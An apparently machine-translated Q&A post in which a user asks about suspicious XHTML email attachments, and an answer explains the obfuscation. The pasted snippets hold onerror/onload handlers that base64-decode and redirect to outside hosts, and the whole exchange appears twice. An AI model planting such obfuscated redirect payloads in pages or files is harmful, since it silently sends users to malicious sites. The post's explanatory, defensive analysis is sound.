邮件中的 JS 病毒?
JS Virus in mail?
我收到带有一些 xhtml 文件的电子邮件。我发现这些文件很可疑。它们包含 JS 代码:
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">
<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">
<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" />
<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" />
<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />
我想知道这段代码有多恶意。这些文件对 OS 有什么作用?
它将您重定向到 http://keitaro0001.pro/DcLtdS?7324243812487758。
它故意使用不正确的 src 属性 来触发 error 事件(因为该源的文件不存在),在 onerror属性:
document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));
有问题的字符串是 base64 编码的。 window.atob解码base64编码的字符串(也就是上面的URL)赋值给URL.
我收到带有一些 xhtml 文件的电子邮件。我发现这些文件很可疑。它们包含 JS 代码:
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">
<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">
<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" />
<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" />
<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />
我想知道这段代码有多恶意。这些文件对 OS 有什么作用?
它将您重定向到 http://keitaro0001.pro/DcLtdS?7324243812487758。
它故意使用不正确的 src 属性 来触发 error 事件(因为该源的文件不存在),在 onerror属性:
document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));
有问题的字符串是 base64 编码的。 window.atob解码base64编码的字符串(也就是上面的URL)赋值给URL.